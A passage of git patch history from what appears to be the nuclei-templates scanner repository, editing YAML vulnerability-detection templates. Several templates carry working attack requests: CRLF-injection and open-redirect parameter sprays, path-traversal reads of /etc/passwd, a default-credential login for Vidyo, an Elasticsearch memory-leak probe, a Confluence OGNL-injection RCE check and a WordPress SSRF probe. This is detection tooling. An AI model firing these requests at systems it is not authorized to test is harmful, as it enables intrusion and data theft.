"{{BaseURL}}/views/ajax/autocomplete/user/a" - "{{BaseURL}}/?q=admin/views/ajax/autocomplete/user/a" - "{{BaseURL}}/?q=views/ajax/autocomplete/user/a" - headers: - User-Agent: "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0" + stop-at-first-match: true matchers-condition: and matchers: - type: word diff --git a/misconfiguration/drupal/drupal-user-enum-redirect.yaml b/misconfiguration/drupal/drupal-user-enum-redirect.yaml index 4479baf99b..d004bb85be 100644 --- a/misconfiguration/drupal/drupal-user-enum-redirect.yaml +++ b/misconfiguration/drupal/drupal-user-enum-redirect.yaml @@ -13,17 +13,19 @@ requests: - "{{BaseURL}}/user/1" - "{{BaseURL}}/user/2" - "{{BaseURL}}/user/3" - headers: - User-Agent: "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0" + + stop-at-first-match: true matchers-condition: and matchers: - type: regex regex: - '(?i)Location: http(s|):\/\/[\w\.\-]+(\/ar|\/en|)\/users\/\w+' part: header + - type: status status: - 301 + extractors: - type: regex part: header diff --git a/technologies/apache-axis-detect.yaml b/technologies/apache-axis-detect.yaml index 2c9733d95c..b5b574a7b5 100644 --- a/technologies/apache-axis-detect.yaml +++ b/technologies/apache-axis-detect.yaml @@ -14,6 +14,7 @@ requests: - "{{BaseURL}}/axis2/" - "{{BaseURL}}/axis/" + stop-at-first-match: true matchers-condition: and matchers: - type: word diff --git a/technologies/graphql-detect.yaml b/technologies/graphql-detect.yaml index 399e476c60..ef649b7d06 100644 --- a/technologies/graphql-detect.yaml +++ b/technologies/graphql-detect.yaml @@ -52,6 +52,7 @@ requests: body: '{"query":"query IntrospectionQuery{__schema {queryType { name }}}"}' + stop-at-first-match: true matchers-condition: and matchers: - type: status diff --git a/technologies/lotus-domino-version.yaml b/technologies/lotus-domino-version.yaml index 7b78fff53e..3af4529ee9 100644 --- a/technologies/lotus-domino-version.yaml +++ b/technologies/lotus-domino-version.yaml @@ -14,6 +14,7 @@ requests: - "{{BaseURL}}/iNotes/Forms85.nsf" - "{{BaseURL}}/iNotes/Forms9.nsf" + stop-at-first-match: true matchers-condition: and matchers: - type: status diff --git a/technologies/telerik-dialoghandler-detect.yaml b/technologies/telerik-dialoghandler-detect.yaml index 6812bbb416..6342e702d6 100644 --- a/technologies/telerik-dialoghandler-detect.yaml +++ b/technologies/telerik-dialoghandler-detect.yaml @@ -29,6 +29,7 @@ requests: - '{{BaseURL}}/cms/portlets/Telerik.Web.UI.DialogHandler.aspx?dp=1' - '{{BaseURL}}/dashboard/UserControl/CMS/Page/Telerik.Web.UI.DialogHandler.aspx/Desktopmodules/Admin/dnnWerk.Users/DialogHandler.aspx?dp=1' + stop-at-first-match: true matchers-condition: and matchers: - type: status diff --git a/vulnerabilities/generic/crlf-injection.yaml b/vulnerabilities/generic/crlf-injection.yaml index 262f9ca437..b06abf0aa2 100644 --- a/vulnerabilities/generic/crlf-injection.yaml +++ b/vulnerabilities/generic/crlf-injection.yaml @@ -20,6 +20,7 @@ requests: - "{{BaseURL}}/?Page=%0D%0ASet-Cookie:crlfinjection=crlfinjection&_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&callback=%0D%0ASet-Cookie:crlfinjection=crlfinjection&checkout_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&content=%0D%0ASet-Cookie:crlfinjection=crlfinjection&continue=%0D%0ASet-Cookie:crlfinjection=crlfinjection&continueTo=%0D%0ASet-Cookie:crlfinjection=crlfinjection&counturl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&data=%0D%0ASet-Cookie:crlfinjection=crlfinjection&dest=%0D%0ASet-Cookie:crlfinjection=crlfinjection&dest_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&dir=%0D%0ASet-Cookie:crlfinjection=crlfinjection&document=%0D%0ASet-Cookie:crlfinjection=crlfinjection&domain=%0D%0ASet-Cookie:crlfinjection=crlfinjection&done=%0D%0ASet-Cookie:crlfinjection=crlfinjection&download=%0D%0ASet-Cookie:crlfinjection=crlfinjection&feed=%0D%0ASet-Cookie:crlfinjection=crlfinjection&file=%0D%0ASet-Cookie:crlfinjection=crlfinjection&host=%0D%0ASet-Cookie:crlfinjection=crlfinjection&html=%0D%0ASet-Cookie:crlfinjection=crlfinjection&http=%0D%0ASet-Cookie:crlfinjection=crlfinjection&https=%0D%0ASet-Cookie:crlfinjection=crlfinjection&image=%0D%0ASet-Cookie:crlfinjection=crlfinjection&image_src=%0D%0ASet-Cookie:crlfinjection=crlfinjection&image_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&imageurl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&include=%0D%0ASet-Cookie:crlfinjection=crlfinjection&media=%0D%0ASet-Cookie:crlfinjection=crlfinjection&navigation=%0D%0ASet-Cookie:crlfinjection=crlfinjection&next=%0D%0ASet-Cookie:crlfinjection=crlfinjection&open=%0D%0ASet-Cookie:crlfinjection=crlfinjection&out=%0D%0ASet-Cookie:crlfinjection=crlfinjection&page=%0D%0ASet-Cookie:crlfinjection=crlfinjection&page_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&pageurl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&path=%0D%0ASet-Cookie:crlfinjection=crlfinjection&picture=%0D%0ASet-Cookie:crlfinjection=crlfinjection&port=%0D%0ASet-Cookie:crlfinjection=crlfinjection&proxy=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redir=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redirect=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redirectUri&redirectUrl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&reference=%0D%0ASet-Cookie:crlfinjection=crlfinjection&referrer=%0D%0ASet-Cookie:crlfinjection=crlfinjection&req=%0D%0ASet-Cookie:crlfinjection=crlfinjection&request=%0D%0ASet-Cookie:crlfinjection=crlfinjection&retUrl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&return=%0D%0ASet-Cookie:crlfinjection=crlfinjection&returnTo=%0D%0ASet-Cookie:crlfinjection=crlfinjection&return_path=%0D%0ASet-Cookie:crlfinjection=crlfinjection&return_to=%0D%0ASet-Cookie:crlfinjection=crlfinjection&rurl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&show=%0D%0ASet-Cookie:crlfinjection=crlfinjection&site=%0D%0ASet-Cookie:crlfinjection=crlfinjection&source=%0D%0ASet-Cookie:crlfinjection=crlfinjection&src=%0D%0ASet-Cookie:crlfinjection=crlfinjection&target=%0D%0ASet-Cookie:crlfinjection=crlfinjection&to=%0D%0ASet-Cookie:crlfinjection=crlfinjection&uri=%0D%0ASet-Cookie:crlfinjection=crlfinjection&url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&val=%0D%0ASet-Cookie:crlfinjection=crlfinjection&validate=%0D%0ASet-Cookie:crlfinjection=crlfinjection&view=%0D%0ASet-Cookie:crlfinjection=crlfinjection&window=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redirect_to=%0D%0ASet-Cookie:crlfinjection=crlfinjection" - "{{BaseURL}}/?Test=%0D%0ASet-Cookie:crlfinjection=crlfinjection" + stop-at-first-match: true matchers: - type: regex regex: diff --git a/vulnerabilities/generic/generic-linux-lfi.yaml b/vulnerabilities/generic/generic-linux-lfi.yaml index a90cca9492..20829a0aea 100644 --- a/vulnerabilities/generic/generic-linux-lfi.yaml +++ b/vulnerabilities/generic/generic-linux-lfi.yaml @@ -45,6 +45,7 @@ requests: - "{{BaseURL}}/?redirect=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd" - "{{BaseURL}}/?page=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd" + stop-at-first-match: true matchers: - type: regex words: diff --git a/vulnerabilities/generic/generic-windows-lfi.yaml b/vulnerabilities/generic/generic-windows-lfi.yaml index 1e77b5937b..5297d77088 100644 --- a/vulnerabilities/generic/generic-windows-lfi.yaml +++ b/vulnerabilities/generic/generic-windows-lfi.yaml @@ -21,6 +21,7 @@ requests: - "{{BaseURL}}/?page=..%2f..%2f..%2f..%2f..%2fwindows/win.ini" - "{{BaseURL}}/?url=..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini" + stop-at-first-match: true matchers: - type: word words: diff --git a/vulnerabilities/generic/open-redirect.yaml b/vulnerabilities/generic/open-redirect.yaml index 7941072763..7190b73c58 100644 --- a/vulnerabilities/generic/open-redirect.yaml +++ b/vulnerabilities/generic/open-redirect.yaml @@ -35,6 +35,7 @@ requests: - '{{BaseURL}}/?page=example.com&_url=example.com&callback=example.com&checkout_url=example.com&content=example.com&continue=example.com&continueTo=example.com&counturl=example.com&data=example.com&dest=example.com&dest_url=example.com&diexample.com&document=example.com&domain=example.com&done=example.com&download=example.com&feed=example.com&file=example.com&host=example.com&html=example.com&http=example.com&https=example.com&image=example.com&image_src=example.com&image_url=example.com&imageurl=example.com&include=example.com&langTo=example.com&media=example.com&navigation=example.com&next=example.com&open=example.com&out=example.com&page=example.com&page_url=example.com&pageurl=example.com&path=example.com&picture=example.com&port=example.com&proxy=example.com&redir=example.com&redirect=example.com&redirectUri=example.com&redirectUrl=example.com&reference=example.com&referrer=example.com&req=example.com&request=example.com&retUrl=example.com&return=example.com&returnTo=example.com&return_path=example.com&return_to=example.com&rurl=example.com&show=example.com&site=example.com&source=example.com&src=example.com&target=example.com&to=example.com&uri=example.com&url=example.com&val=example.com&validate=example.com&view=example.com&window=example.com&redirect_to=example.com&ret=example.com&r2=example.com&img=example.com&u=example.com&r=example.com&URL=example.com&AuthState=example.com' - '{{BaseURL}}/1/_https@example.com' + stop-at-first-match: true matchers-condition: and matchers: - type: regex diff --git a/vulnerabilities/other/bitrix-open-redirect.yaml b/vulnerabilities/other/bitrix-open-redirect.yaml index d8b2d88748..4b8022a318 100644 --- a/vulnerabilities/other/bitrix-open-redirect.yaml +++ b/vulnerabilities/other/bitrix-open-redirect.yaml @@ -24,6 +24,7 @@ requests: - '{{BaseURL}}/bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2=&event3=download&goto=https://example.com' - '{{BaseURL}}/bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2=&event3=download&goto=https://example.com' + stop-at-first-match: true matchers-condition: and matchers: - type: regex diff --git a/vulnerabilities/other/nginx-merge-slashes-path-traversal.yaml b/vulnerabilities/other/nginx-merge-slashes-path-traversal.yaml index a1913d882f..05bb45755f 100644 --- a/vulnerabilities/other/nginx-merge-slashes-path-traversal.yaml +++ b/vulnerabilities/other/nginx-merge-slashes-path-traversal.yaml @@ -16,6 +16,7 @@ requests: - "{{BaseURL}}/static///////../../../../etc/passwd" - "{{BaseURL}}///../app.js" + stop-at-first-match: true matchers-condition: and matchers: diff --git a/vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml b/vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml index 5347bbcd7a..9a5ea5ef29 100644 --- a/vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml +++ b/vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml @@ -27,6 +27,8 @@ requests: - '{{BaseURL}}/wp-config.php.orig' - '{{BaseURL}}/wp-config.php.original' - '{{BaseURL}}/_wpeprivate/config.json' + + stop-at-first-match: true matchers-condition: and matchers: - type: word From 439200da3c259cd51250a5a114211b35c81f800b Mon Sep 17 00:00:00 2001 From: Prince Chaddha <prince@projectdiscovery.io> Date: Thu, 2 Sep 2021 18:02:49 +0530 Subject: [PATCH 1984/4083] Update craft-cms-detect.yaml --- technologies/craft-cms-detect.yaml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/technologies/craft-cms-detect.yaml b/technologies/craft-cms-detect.yaml index ecdf4071dd..6eea460a62 100644 --- a/technologies/craft-cms-detect.yaml +++ b/technologies/craft-cms-detect.yaml @@ -19,6 +19,11 @@ requests: words: - 'X-Powered-By: Craft CMS' + - type: regex + part: header + regex: + - 'Set-Cookie: (Craft|CRAFT)' + - type: status status: - 200 From 7930444ec51a9924cbe8477bd32a768a83d1d201 Mon Sep 17 00:00:00 2001 From: Prince Chaddha <prince@projectdiscovery.io> Date: Thu, 2 Sep 2021 18:07:40 +0530 Subject: [PATCH 1985/4083] Update craft-cms-detect.yaml --- technologies/craft-cms-detect.yaml | 7 +++---- 1 file changed, 3 insertions(+), 4 deletions(-) diff --git a/technologies/craft-cms-detect.yaml b/technologies/craft-cms-detect.yaml index 6eea460a62..ffd1e49a96 100644 --- a/technologies/craft-cms-detect.yaml +++ b/technologies/craft-cms-detect.yaml @@ -13,6 +13,9 @@ requests: path: - '{{BaseURL}}' + redirects: true + max-redirects: 2 + matchers: - type: word part: header @@ -23,7 +26,3 @@ requests: part: header regex: - 'Set-Cookie: (Craft|CRAFT)' - - - type: status - status: - - 200 From 3b32de60be7a061dc8c6a2f1535ccc0a2f84f049 Mon Sep 17 00:00:00 2001 From: Prince Chaddha <prince@projectdiscovery.io> Date: Thu, 2 Sep 2021 18:25:16 +0530 Subject: [PATCH 1986/4083] Update CVE-2020-11547.yaml --- cves/2020/CVE-2020-11547.yaml | 21 ++++++++++++++++----- 1 file changed, 16 insertions(+), 5 deletions(-) diff --git a/cves/2020/CVE-2020-11547.yaml b/cves/2020/CVE-2020-11547.yaml index a438eb3bb3..80fa059eb9 100644 --- a/cves/2020/CVE-2020-11547.yaml +++ b/cves/2020/CVE-2020-11547.yaml @@ -5,19 +5,30 @@ info: author: x6263 severity: medium description: PRTG Network Monitor before 20.1.57.1745 allows remote unauthenticated attackers to obtain information about probes running or the server itself via an HTTP request. - reference: | - - https://nvd.nist.gov/vuln/detail/CVE-2020-11547 + reference: - https://github.com/ch-rigu/CVE-2020-11547--PRTG-Network-Monitor-Information-Disclosure - tags: cve,cve2020,network,prtg,information-disclosure + - https://nvd.nist.gov/vuln/detail/CVE-2020-11547 + tags: cve,cve2020,prtg,disclosure requests: - method: GET path: - - "{{BaseURL}}/public/login.htm?type=probes/" + - "{{BaseURL}}/public/login.htm?type=probes" + - "{{BaseURL}}/public/login.htm?type=requests" + + req-condition: true + matchers-condition: and matchers: + - type: dsl + dsl: + - "contains((body_1), 'Probe #1') && contains((body_2), '<span>Configuration Requests Sent</span>')" + part: body + - type: word words: - - "Probe" + - "prtg_network_monitor" + part: body + - type: status status: - 200 From 5414f9a618abe080720f14bfbe262a3413345303 Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Thu, 2 Sep 2021 10:36:46 -0500 Subject: [PATCH 1987/4083] Update general-tokens.yaml --- exposures/tokens/generic/general-tokens.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/exposures/tokens/generic/general-tokens.yaml b/exposures/tokens/generic/general-tokens.yaml index e7ac38b27b..7a2bb134c8 100644 --- a/exposures/tokens/generic/general-tokens.yaml +++ b/exposures/tokens/generic/general-tokens.yaml @@ -29,6 +29,7 @@ requests: - '(?i)password(lessauth|requirementsashtmllist|emailnotfoundmessage|label|errormessage|message|_checkemail_title|_newfield_retype|_text_new|login_submit|_has_expired_title|_has_expired_text|_error|_hint|_strength)' - '(?i)(!native)|(.*keybindings)' - '(?i)(layout|a)key' + - '(?i)token_expires_in' condition: or negative: true From 38d219be53be404790bf298d7703ff0828794966 Mon Sep 17 00:00:00 2001 From: izn0u <glasson@protonmail.com> Date: Thu, 2 Sep 2021 16:15:34 +0000 Subject: [PATCH 1988/4083] Added vidyo-super default-creds Template --- default-logins/vidyo/vidyo-super-admin.yaml | 86 +++++++++++++++++++++ 1 file changed, 86 insertions(+) create mode 100644 default-logins/vidyo/vidyo-super-admin.yaml diff --git a/default-logins/vidyo/vidyo-super-admin.yaml b/default-logins/vidyo/vidyo-super-admin.yaml new file mode 100644 index 0000000000..d168d2e3e0 --- /dev/null +++ b/default-logins/vidyo/vidyo-super-admin.yaml @@ -0,0 +1,86 @@ +id: vidyo-Default-Credentials + +info: + name: Vidyo Default Credentials + author: izn0u0 + severity: medium + description: test for default cred super:password + tags: vidyo,default-login + + +requests: + - raw: + - | + GET /super/login.html?lang=en HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} + Connection: close + User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 + Accept-Language: en-US,en;q=0.9 + - | + POST /super/super_security_check;jsessionid={{session}}?csrf_tkn={{csrf_tkn}} HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 + Accept-Language: en-US,en;q=0.5 + Accept-Encoding: gzip, deflate + Content-Type: application/x-www-form-urlencoded + Content-Length: 32 + Origin: {{BaseURL}} + DNT: 1 + Connection: close + Referer: http://{{Hostname}}/super/login.html?lang=en + Cookie: JSESSIONID={{session}} ; VidyoPortalSuperLanguage=en + Upgrade-Insecure-Requests: 1 + + username=super&password=password + + + - | + GET /super/loginhistory.html?csrf_tkn={{csrf_tkn}} HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 + Accept-Language: en-US,en;q=0.5 + Accept-Encoding: gzip, deflate + Referer: {{BaseURL}}/super/login.html?lang=en + DNT: 1 + Connection: close + Upgrade-Insecure-Requests: 1 + + + + + + extractors: + - type: regex + name: csrf_tkn + group: 1 + part: body + internal: true + regex: + - 'csrf_tkn=([A-Za-z0-9.-]+)' + + - type: kval + name: session + internal: true + part: header + kval: + - JSESSIONID + + cookie-reuse: true + redirects: true + #matchers-condition: and + matchers: + - type: status + status: + - 200 + + #- type: word + #words: + #- "welcome to" + #part: body + #- type: dsl + #dsl: + #- 'contains(body, "welcome to")' \ No newline at end of file From c2048eb6b596559b67f3ddef363b62b17c3f0a7a Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Thu, 2 Sep 2021 22:07:29 +0530 Subject: [PATCH 1989/4083] Added CVE-2021-22145 Co-Authored-By: Dhiyaneshwaran <leedhiyanesh@gmail.com> --- cves/2021/CVE-2021-22145.yaml | 36 +++++++++++++++++++++++++++++++++++ 1 file changed, 36 insertions(+) create mode 100644 cves/2021/CVE-2021-22145.yaml diff --git a/cves/2021/CVE-2021-22145.yaml b/cves/2021/CVE-2021-22145.yaml new file mode 100644 index 0000000000..e018f535d1 --- /dev/null +++ b/cves/2021/CVE-2021-22145.yaml @@ -0,0 +1,36 @@ +id: CVE-2021-22145 + +info: + name: ElasticSearch 7.13.3 - Memory disclosure + author: dhiyaneshDk + severity: medium + description: A memory disclosure vulnerability was identified in Elasticsearch 7.10.0 to 7.13.3 error reporting. A user with the ability to submit arbitrary queries to Elasticsearch could submit a malformed query that would result in an error message returned containing previously used portions of a data buffer. This buffer could contain sensitive information such as Elasticsearch documents or authentication details. + reference: + - https://github.com/jaeles-project/jaeles-signatures/blob/e9595197c80521d64e31b846808095dd07c407e9/cves/elasctic-memory-leak-cve-2021-22145.yaml + - https://nvd.nist.gov/vuln/detail/CVE-2021-22145 + - https://packetstormsecurity.com/files/163648/ElasticSearch-7.13.3-Memory-Disclosure.html + tags: cve,cve2021,elascticsearch + +requests: + - method: POST + path: + - '{{BaseURL}}/_bulk' + headers: + Content-Type: application/json + body: | + @ + + matchers-condition: and + matchers: + + - type: word + words: + - 'root_cause' + - 'truncated' + - 'reason' + part: body + condition: and + + - type: status + status: + - 400 From 223c8ea750502d5db6c323b4196cfb8b0d1e6ba3 Mon Sep 17 00:00:00 2001 From: izn0u <40471524+izn0u@users.noreply.github.com> Date: Thu, 2 Sep 2021 16:43:49 +0000 Subject: [PATCH 1990/4083] Update vidyo-super-admin.yaml --- default-logins/vidyo/vidyo-super-admin.yaml | 11 +---------- 1 file changed, 1 insertion(+), 10 deletions(-) diff --git a/default-logins/vidyo/vidyo-super-admin.yaml b/default-logins/vidyo/vidyo-super-admin.yaml index d168d2e3e0..901a75a5b3 100644 --- a/default-logins/vidyo/vidyo-super-admin.yaml +++ b/default-logins/vidyo/vidyo-super-admin.yaml @@ -2,7 +2,7 @@ id: vidyo-Default-Credentials info: name: Vidyo Default Credentials - author: izn0u0 + author: izn0u severity: medium description: test for default cred super:password tags: vidyo,default-login @@ -71,16 +71,7 @@ requests: cookie-reuse: true redirects: true - #matchers-condition: and matchers: - type: status status: - 200 - - #- type: word - #words: - #- "welcome to" - #part: body - #- type: dsl - #dsl: - #- 'contains(body, "welcome to")' \ No newline at end of file From 8b37808730a9fcd9aa92e9a6fd7b8258215c277b Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Thu, 2 Sep 2021 22:57:55 +0530 Subject: [PATCH 1991/4083] misc update --- exposures/apis/wadl-api.yaml | 11 +++++------ 1 file changed, 5 insertions(+), 6 deletions(-) diff --git a/exposures/apis/wadl-api.yaml b/exposures/apis/wadl-api.yaml index b4651efac5..9f1cbe09ec 100644 --- a/exposures/apis/wadl-api.yaml +++ b/exposures/apis/wadl-api.yaml @@ -17,15 +17,16 @@ requests: - "{{BaseURL}}/api/application.wadl" - "{{BaseURL}}/api/v1/application.wadl" - "{{BaseURL}}/api/v2/application.wadl" + + stop-at-first-match: true matchers: - name: http-get type: word words: - "This is simplified WADL with user and core resources only" - - "\"http://jersey.java.net/\"" + - "http://jersey.java.net" - "http://wadl.dev.java.net/2009/02" - condition: or - part: body + - method: OPTIONS path: - "{{BaseURL}}" @@ -38,7 +39,5 @@ requests: type: word words: - "This is simplified WADL with user and core resources only" - - "\"http://jersey.java.net/\"" + - "http://jersey.java.net" - "http://wadl.dev.java.net/2009/02" - condition: or - part: body From f5153bda65eb5340065c1f91701fb347e4c2cf70 Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Thu, 2 Sep 2021 23:02:41 +0530 Subject: [PATCH 1992/4083] Update vidyo-super-admin.yaml --- default-logins/vidyo/vidyo-super-admin.yaml | 30 +++------------------ 1 file changed, 4 insertions(+), 26 deletions(-) diff --git a/default-logins/vidyo/vidyo-super-admin.yaml b/default-logins/vidyo/vidyo-super-admin.yaml index 901a75a5b3..dc9e7c8953 100644 --- a/default-logins/vidyo/vidyo-super-admin.yaml +++ b/default-logins/vidyo/vidyo-super-admin.yaml @@ -10,47 +10,25 @@ info: requests: - raw: - - | + - | GET /super/login.html?lang=en HTTP/1.1 Host: {{Hostname}} Origin: {{BaseURL}} - Connection: close - User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 - Accept-Language: en-US,en;q=0.9 - - | + + - | POST /super/super_security_check;jsessionid={{session}}?csrf_tkn={{csrf_tkn}} HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 - Accept-Language: en-US,en;q=0.5 - Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded - Content-Length: 32 Origin: {{BaseURL}} - DNT: 1 - Connection: close Referer: http://{{Hostname}}/super/login.html?lang=en Cookie: JSESSIONID={{session}} ; VidyoPortalSuperLanguage=en - Upgrade-Insecure-Requests: 1 username=super&password=password - - - | + - | GET /super/loginhistory.html?csrf_tkn={{csrf_tkn}} HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 - Accept-Language: en-US,en;q=0.5 - Accept-Encoding: gzip, deflate Referer: {{BaseURL}}/super/login.html?lang=en - DNT: 1 - Connection: close - Upgrade-Insecure-Requests: 1 - - - extractors: From 601aa39472b51a0a1dd228ada5ddf4592ae5b2bf Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Thu, 2 Sep 2021 23:03:07 +0530 Subject: [PATCH 1993/4083] Update vidyo-super-admin.yaml --- default-logins/vidyo/vidyo-super-admin.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/default-logins/vidyo/vidyo-super-admin.yaml b/default-logins/vidyo/vidyo-super-admin.yaml index dc9e7c8953..c3b20673bb 100644 --- a/default-logins/vidyo/vidyo-super-admin.yaml +++ b/default-logins/vidyo/vidyo-super-admin.yaml @@ -1,4 +1,4 @@ -id: vidyo-Default-Credentials +id: vidyo-default-credentials info: name: Vidyo Default Credentials From fb0aabfe968068b3d0748d1194e720b5c20b8c96 Mon Sep 17 00:00:00 2001 From: Philippe Delteil <pdelteil@gmail.com> Date: Thu, 2 Sep 2021 13:35:07 -0400 Subject: [PATCH 1994/4083] Update CVE-2021-26084.yaml Extra paths were I did found vulnerable assets --- cves/2021/CVE-2021-26084.yaml | 20 ++++++++++++++++++-- 1 file changed, 18 insertions(+), 2 deletions(-) diff --git a/cves/2021/CVE-2021-26084.yaml b/cves/2021/CVE-2021-26084.yaml index c37f54cd81..8ed6fb59a8 100644 --- a/cves/2021/CVE-2021-26084.yaml +++ b/cves/2021/CVE-2021-26084.yaml @@ -1,7 +1,7 @@ id: CVE-2021-26084 info: - author: dhiyaneshDk + author: dhiyaneshDk,philippedelteil severity: critical name: Confluence Server OGNL injection - RCE description: In affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an authenticated user, and in some instances an unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance. The vulnerable endpoints can be accessed by a non-administrator user or unauthenticated user if ‘Allow people to sign up to create their account’ is enabled. To check whether this is enabled go to COG > User Management > User Signup Options. The affected versions are before version 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5. @@ -19,7 +19,23 @@ requests: Content-Type: application/x-www-form-urlencoded queryString=aaaa\u0027%2b#{16*8787}%2b\u0027bbb + - raw: + - | + POST /confluence/pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + queryString=aaaa\u0027%2b#{16*8787}%2b\u0027bbb + + - raw: + - | + POST /wiki/pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + queryString=aaaa\u0027%2b#{16*8787}%2b\u0027bbb + + stop-at-first-match: true matchers-condition: and matchers: - type: status @@ -29,4 +45,4 @@ requests: - type: word part: body words: - - 'value="aaaa{140592=null}' \ No newline at end of file + - 'value="aaaa{140592=null}' From c038ae90abeb0579c3b09419a079816c9c9b38cf Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Thu, 2 Sep 2021 23:05:12 +0530 Subject: [PATCH 1995/4083] Update vidyo-super-admin.yaml --- default-logins/vidyo/vidyo-super-admin.yaml | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/default-logins/vidyo/vidyo-super-admin.yaml b/default-logins/vidyo/vidyo-super-admin.yaml index c3b20673bb..0749aa4548 100644 --- a/default-logins/vidyo/vidyo-super-admin.yaml +++ b/default-logins/vidyo/vidyo-super-admin.yaml @@ -30,6 +30,8 @@ requests: Host: {{Hostname}} Referer: {{BaseURL}}/super/login.html?lang=en + cookie-reuse: true + redirects: true extractors: - type: regex @@ -47,9 +49,7 @@ requests: kval: - JSESSIONID - cookie-reuse: true - redirects: true matchers: - - type: status - status: - - 200 + - type: word + words: + - "Vidyo MainSuperAdmin" From f0197ae9ac301013a81d974d54b5d2cb72e58b10 Mon Sep 17 00:00:00 2001 From: LogicalHunter <vicforbounty@gmail.com> Date: Thu, 2 Sep 2021 12:13:21 -0700 Subject: [PATCH 1996/4083] Added CVE-2020-28976.yaml Template --- cves/2020/CVE-2020-28976.yaml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 cves/2020/CVE-2020-28976.yaml diff --git a/cves/2020/CVE-2020-28976.yaml b/cves/2020/CVE-2020-28976.yaml new file mode 100644 index 0000000000..c3cb68cde0 --- /dev/null +++ b/cves/2020/CVE-2020-28976.yaml @@ -0,0 +1,24 @@ +id: CVE-2020-28976 + +info: + name: Wordpress Plugin Canto 1.3.0 - Blind SSRF (Unauthenticated) + author: LogicalHunter + severity: high + reference: + - https://www.exploit-db.com/exploits/49189 + - https://nvd.nist.gov/vuln/detail/CVE-2020-28976 + tags: cve,cve2020,ssrf,wordpress,wp-plugin + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/canto/includes/lib/detail.php?subdomain={{interactsh-url}}" + - 